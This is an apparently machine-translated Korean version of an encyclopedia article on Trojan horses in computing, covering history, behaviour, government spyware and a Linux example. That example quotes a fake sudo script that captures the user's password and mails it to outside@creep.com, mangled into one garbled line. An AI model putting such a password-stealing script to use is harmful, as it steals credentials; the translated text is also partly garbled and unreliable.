Page semi-protected

트로이 목마(컴퓨팅)

Trojan horse (computing)

컴퓨팅에서 트로이목마는 사용자의 본심을 오도하는 악성 프로그램입니다.이 용어는 [1][2][3][4][5]트로이 도시를 함락시킨 기만적인 트로이 목마에 대한 고대 그리스 이야기에서 유래되었다.

트로이 목마는 일반적으로 어떤 형태의 사회 공학에 의해 확산됩니다.예를 들어, 사용자가 악의 없는 것처럼 위장된 이메일 첨부 파일을 실행하도록 속거나(예를 들어, 기입해야 할 일상적인 양식), 소셜 미디어나 다른 곳에서 가짜 광고를 클릭함으로써 속습니다.payload는 어떤 것이든 상관없습니다만, 많은 최신 형식은 백도어 역할을 하며 컨트롤러에 연락하면 컨트롤러가 영향을 받는 컴퓨터에 [6]부정 액세스 할 수 있습니다.랜섬웨어 공격은 트로이 목마를 사용하여 실행되는 경우가 많습니다.

컴퓨터 바이러스, 악성 보안 소프트웨어달리 트로이 목마는 일반적으로 다른 파일에 삽입하거나 다른 방법으로 [7]전파하지 않습니다.

용어의 사용

이 개념이 어디서, 언제, 그리고 이 용어를 처음 사용했는지는 분명하지 않지만, 1971년에 첫 번째 유닉스 매뉴얼은 독자들이 이 [8]두 가지를 모두 알고 있다고 가정했다.

또한 파일 소유자(사용자)를 변경할 수 없습니다.ID가 비트로 설정되어 있지 않으면 트로이 목마를 생성하여 다른 사람의 파일을 오용할 수 있습니다.

또 다른 초기 참조는 1974년 다중 컴퓨터 [9]시스템의 취약점 분석에 관한 미 공군 보고서에 있다.

이것은 켄 톰슨이 1983년 튜링상 수상 강연인 "신뢰에 대한 성찰"[10]에서 인기를 끌었다.프로그램에 트로이 목마가 없다는 진술을 어느 정도 신뢰해야 하는가? 아마도 소프트웨어를 만든 사람들을 신뢰하는 것이 더 중요할 것이다.그는 Multics의 [11][12]보안에 관한 보고서를 통해 트로이 목마 존재 가능성에 대해 알고 있다고 언급했다.

행동

일단 설치되면 트로이 목마는 다양한 악의적인 액션을 수행할 수 있습니다.많은 사람들이 인터넷을 통해 하나 이상의 명령어제어(C2) 서버에 접속하여 지시를 기다리는 경향이 있습니다.일반적으로 개별 트로이 목마는 이 통신에 특정 포트 세트를 사용하기 때문에 비교적 쉽게 검출할 수 있습니다.또한 다른 악성 프로그램이 트로이 목마를 악의적인 [13]액션의 프록시로 사용하여 잠재적으로 트로이 목마를 "인계"할 수 있습니다.

독일어권 국가에서는 정부가 사용하거나 만든 스파이웨어goverware라고 부르기도 합니다.Goverware는 일반적으로 타깃 컴퓨터로부터의 통신을 대행 수신하는 데 사용되는 트로이 목마 소프트웨어입니다.스위스나 독일과 같은 일부 국가는 이러한 [14][15]소프트웨어의 사용을 관리하는 법적 체계를 가지고 있다.Goverware 트로이 목마의 예로는 스위스 MiniPanzer 및[16] MegaPanzer, R2D2라는 [14]별명을 가진 독일 '스테이트 트로이 목마'이 있습니다.독일 가브웨어는 일반인이 모르는 보안 격차를 악용해 스마트폰 데이터가 [17]다른 애플리케이션을 통해 암호화되기 전에 액세스하는 방식으로 작동합니다.

해커들 사이에서 봇넷의 인기와 저자가 사용자의 사생활을 침해할 수 있는 광고 서비스의 이용 가능성으로 인해 트로이 목마는 점점 더 보편화되고 있다.BitDefender가 2009년 1월부터 6월까지 실시한 조사에 따르면, "트로이형 악성코드는 전 세계에서 검출된 악성코드의 83%를 차지하며 증가하고 있습니다."트로이 목마는 웜의 도움으로 퍼지고 그들과 [18]함께 인터넷을 통해 이동하기 때문에 웜과 관계가 있다.BitDefender는 컴퓨터의 약 15%가 보통 트로이 목마 감염에 [19]의해 모집되는 봇넷의 멤버라고 언급했습니다.

Linux 예시

트로이목마는 명백한 기능을 수행한다고 주장하지만 실행 시 사용자의 [20]보안을 해치는 프로그램입니다.한 가지 쉬운 프로그램은 Linux sudo 명령어의 새로운 버전입니다.그런 다음 명령어는 다음과 같은 공용 쓰기 가능한 디렉토리에 복사됩니다./tmp관리자가 우연히 그 디렉토리에 있어 실행했을 경우sudo그러면 트로이 목마가 실행될 수 있습니다.동작하는 버전은 다음과 같습니다.

: # sudo # ---- # 화면에 대한 문자 에코를 끕니다.stty - echo / bin / echo - n " " " password for 'woami : " read x /bin / echo " # 문자 에코를 켭니다.stty echo $x mail -s "woami' password" outside@creep.com sleep 1 echo 죄송합니다.rm $0 exit 0

명령줄 기반 트로이 목마를 방지하려면.에의 엔트리PATH=환경변수는 테일엔드에 배치해야 합니다.예를 들어 다음과 같습니다.PATH=/usr/local/bin:/usr/bin:..

주목할 만한 예

민간 및 정부기관

일반 공개

보안 조사원에 의해 검출됨

대문자로 표시

컴퓨터 용어 "트로이 목마"는 고대 도시 트로이전설적인 트로이 목마에서 유래했습니다.이러한 이유로 "트로이아"는 종종 대문자로 표기된다.그러나 스타일 가이드와 사전은 다르지만, 많은 사람들이 일반적인 사용을 [30][31]위해 소문자 "트로이안"을 제안합니다.

「 」를 참조해 주세요.

레퍼런스

  1. ^ Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). A taxonomy of computer program security flaws, with examples (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved April 5, 2012.
  2. ^ "Trojan Horse Definition". Retrieved April 5, 2012.
  3. ^ "Trojan horse". Webopedia. Retrieved April 5, 2012.
  4. ^ "What is Trojan horse? – Definition from Whatis.com". Retrieved April 5, 2012.
  5. ^ "Trojan Horse: [coined By MIT-hacker-turned-NSA-spook Dan Edwards] N." Retrieved April 5, 2012.
  6. ^ "Difference between viruses, worms, and trojans". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
  7. ^ "VIRUS-L/comp.virus Frequently Asked Questions (FAQ) v2.00 (Question B3: What is a Trojan Horse?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. ^ Thompsom, K. "UNIX PROGRAMMER'S MANUAL, November 3, 1971" (PDF). Retrieved March 28, 2020.
  9. ^ Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. ^ 를 클릭합니다Ken Thompson (1984). "Reflection on Trusting Trust". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. ^ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. ^ Karger et Shell은 Thompson이 튜링 컨퍼런스의 후속 버전에서 이 참조를 추가했다고 썼다.
  13. ^ Crapanzano, Jamie (2003). Deconstructing SubSeven, the Trojan Horse of Choice (Report). SANS Institute. Retrieved May 10, 2021.
  14. ^ a b 바질 큐파, 트로이 목마 부활: 정부 스파이웨어(Govware) 사용의 합법성에 대하여, LISS 2013, 페이지 419–428
  15. ^ "Häufig gestellte Fragen (Frequently Asked Questions)". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  16. ^ Dunn, John (August 27, 2009). "Swiss coder publicises government spy Trojan". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
  17. ^ "German federal police use trojan virus to evade phone encryption". DW. Retrieved April 14, 2018.
  18. ^ "BitDefender Malware and Spam Survey finds E-Threats Adapting to Online Behavioral Trends". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
  19. ^ Datta, Ganesh (August 7, 2014). "What are Trojans?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
  20. ^ Wood, Patrick H.; Kochan, Stephen G. (1985). UNIX System Security. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  21. ^ Seth, Kulakow (1998). "Is it still a Trojan horse or an Actual Valid Remote Control Administration Tool?" (Report). SANS Institute. Retrieved May 10, 2021.
  22. ^ "Mega-Panzer". SourceForge.
  23. ^ "Mini-Panzer". SourceForge.
  24. ^ "Trojanized adware family abuses accessibility service to install whatever apps it wants – Lookout Blog".
  25. ^ Neal, Dave (November 20, 2015). "Shedun trojan adware is hitting the Android Accessibility Service". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.{{cite web}}: CS1 유지보수: 부적합한 URL(링크)
  26. ^ "Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire – Lookout Blog".
  27. ^ "Shuanet, ShiftyBug and Shedun malware could auto-root your Android". November 5, 2015.
  28. ^ Times, Tech (November 9, 2015). "New Family of Android Malware Virtually Impossible To Remove: Say Hello To Shedun, Shuanet And ShiftyBug".
  29. ^ "Android adware can install itself even when users explicitly reject it". November 19, 2015.
  30. ^ "trojan". Collins Advanced Dictionary. Retrieved March 29, 2020.
  31. ^ "trojan horse". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.

외부 링크